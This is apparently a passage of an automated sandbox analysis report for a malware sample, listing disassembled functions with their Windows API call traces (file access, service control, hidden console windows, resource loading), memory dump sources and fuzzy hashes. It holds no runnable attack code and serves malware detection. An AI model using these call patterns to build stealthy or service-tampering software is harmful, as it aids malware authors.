                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                  • String ID:
                                                  • API String ID: 3604237281-0
                                                  • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                  • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                  Function 0210B7F6 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0210B90C,00000000,00000000,?), ref: 0210B835
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B852
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B866
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B873
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                  • String ID:
                                                  • API String ID: 3604237281-0
                                                  • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction ID: a6a10c406fbe68d160daee752661ed3ad9f19ee7e21b2ed9a019a61e5fddee38
                                                  • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction Fuzzy Hash: 7E01D27128D214BFE6144E24ACC9F7B739CEB8627DF00063AFA61C21E1D7A1CE058678
                                                  Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                  • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                  • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                  • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                  Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                  • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                  • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                  • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                  Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                    • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                    • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                  • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                  • String ID:
                                                  • API String ID: 737400349-0
                                                  • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                  • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                  • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                  • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                  Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                  • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                  Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                  • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                  Function 0210B881 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B8AE
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B8D3
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,020F3D5A,00465324), ref: 0210B8E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction ID: ebec845a35412b42efaffd8549f42acf2ef62a7fe5f1cb7d6c98bcae5c99a4ce
                                                  • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction Fuzzy Hash: F7F0FCB12853047FE2101B20FCC4FBF375CDB866A9F000239FD11921D1CB614D059574
                                                  Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                  • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                  • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                  • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                  • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                  • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                  Function 0210C117 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocConsole.KERNEL32 ref: 0210C120
                                                  • GetConsoleWindow.KERNEL32 ref: 0210C126
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0210C139
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0210C15E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$Window$AllocOutputShow
                                                  • String ID:
                                                  • API String ID: 4067487056-0
                                                  • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                  • Instruction ID: 9a41bfcbe2ff8e2544b4deba4b755994cb5bf4c16c665391d8f639bebce93798
                                                  • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                  • Instruction Fuzzy Hash: A40112B1AC0308BFD610FBF19D4AF9E77AEAB14701F500462B644EB1D1EBB9D5084E59
                                                  Function 02109E87 Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020), ref: 02109E96
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020), ref: 02109EAA
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 02109EB7
                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 02109EC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseControlHandleManager
                                                  • String ID:
                                                  • API String ID: 1243734080-0
                                                  • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                  • Instruction ID: a0ff6893ac066d33529e2a61c89f3b78e282ddd7a9ebba51e2f5b88dc8e9f0fa
                                                  • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                  • Instruction Fuzzy Hash: 36F09036540318BFD7117B64AC89EBF3BACDB85AA1B000035FA06921D2DBA4DD46DAB4
                                                  Function 02109F89 Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 02109F98
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 02109FAC
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 02109FB9
                                                  • ControlService.ADVAPI32(00000000,00000002,?), ref: 02109FC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseControlHandleManager
                                                  • String ID:
                                                  • API String ID: 1243734080-0
                                                  • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                  • Instruction ID: f961f415bd94217aa72db777bf033dfe7de1dd3599fcf8b7b5578c76c57d825d
                                                  • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                  • Instruction Fuzzy Hash: D2F0F072544318BFD3106B24AC89EBF3FACDB44AA1B000035FA06A21C2DB64CD06DAB4
                                                  Function 02109FEE Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 02109FFD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 0210A011
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0210A01E
                                                  • ControlService.ADVAPI32(00000000,00000003,?), ref: 0210A02D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseControlHandleManager
                                                  • String ID:
                                                  • API String ID: 1243734080-0
                                                  • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                  • Instruction ID: c6396da77786f4e3488a25401460b0349a301096b3514f8280b4ddc1b6f786e6
                                                  • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                  • Instruction Fuzzy Hash: E9F062725403186BD2216B64EC89EBF3AACDF45AA1B000035FB05961D2DB68D9059AB5
                                                  Function 02109E2B Relevance: 6.0, APIs: 4, Instructions: 39serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,02109A81,00000000,00000000), ref: 02109E34
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,02109A81,00000000,00000000), ref: 02109E49
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,02109A81,00000000,00000000), ref: 02109E56
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,02109A81,00000000,00000000), ref: 02109E61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseHandleManagerStart
                                                  • String ID:
                                                  • API String ID: 2553746010-0
                                                  • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                  • Instruction ID: 8d4d1d33f6e53e6ce0d4b674f1630812c59c3e7a1556ae7c77b2cd742616e986
                                                  • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                  • Instruction Fuzzy Hash: D0F08972545318AFD2115B30AC88EBF3AACEF85AA2B000439F50192191DB64CD05D975
                                                  Function 020F4D18 Relevance: 6.0, APIs: 4, Instructions: 35synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,020F4AA6,00000001,?,?,00000000,00475B70,020F1A5A), ref: 020F4D54
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,020F1A5A), ref: 020F4D60
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,020F1A5A), ref: 020F4D6B
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,020F1A5A), ref: 020F4D74
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID:
                                                  • API String ID: 2993684571-0
                                                  • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                  • Instruction ID: a47084bfeceebbc187daa535a8947e15149a413ebfb05d6f88a0b40608fecad0
                                                  • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                  • Instruction Fuzzy Hash: 54F0E0755847107FDB5137B49D0E6BB7F99EB01311F0009BAFF4282AB1D6748450DB5A
                                                  Function 0210C0D6 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 0210C0E0
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 0210C0ED
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0210C0FA
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0210C10D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID:
                                                  • API String ID: 3024135584-0
                                                  • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction ID: 9572edef1c9fcb62a493dbaeec272b1a0c5f3ef08cb44fea78124464144797d8
                                                  • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction Fuzzy Hash: 31E04F62204348ABD31427F5BC8DCAB3B6CE784613B101535F61291393EA7488448A75
                                                  Function 0210A8A6 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindResourceA.KERNEL32(0046BC64,0000000A,00000000), ref: 0210A8B7
                                                  • LoadResource.KERNEL32(00000000,?,?,020FE3EA,00000000), ref: 0210A8CB
                                                  • LockResource.KERNEL32(00000000,?,?,020FE3EA,00000000), ref: 0210A8D2
                                                  • SizeofResource.KERNEL32(00000000,?,?,020FE3EA,00000000), ref: 0210A8E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                  • Instruction ID: 7f2b417d534a6045671c50af9bb34accdc5ee3c5ada4f87744e601cfa1805cea
                                                  • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                  • Instruction Fuzzy Hash: 7CE01A3A200710ABCB211BA5BC8CD477E39EB86B633100036FA0582331DB358840DA58
                                                  Function 0212A4B2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
                                                  • Instruction ID: 6cd772d4c398a4b5ef552dfe58f1dbace042272c8e1ac74ab4e8dcdd0379e57e
                                                  • Opcode Fuzzy Hash: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
                                                  • Instruction Fuzzy Hash: F791E570D842699FCF24CF69C8506EEBBB6EF45224F18825AF871A7380D3349569CF90
                                                  Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: >G
                                                  • API String ID: 180926312-1296849874
                                                  • Opcode ID: fe08d4ec2e71245ba591ef012b25d98d9fbbdaf0f8974ced9bfb59050c4c653b
                                                  • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                  • Opcode Fuzzy Hash: fe08d4ec2e71245ba591ef012b25d98d9fbbdaf0f8974ced9bfb59050c4c653b
                                                  • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                  Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID: $fD
                                                  • API String ID: 1807457897-3092946448
                                                  • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                  • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                  • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                  • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                  Function 02127CE7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 02127D1A
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 02127DD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3480331319-1018135373
                                                  • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
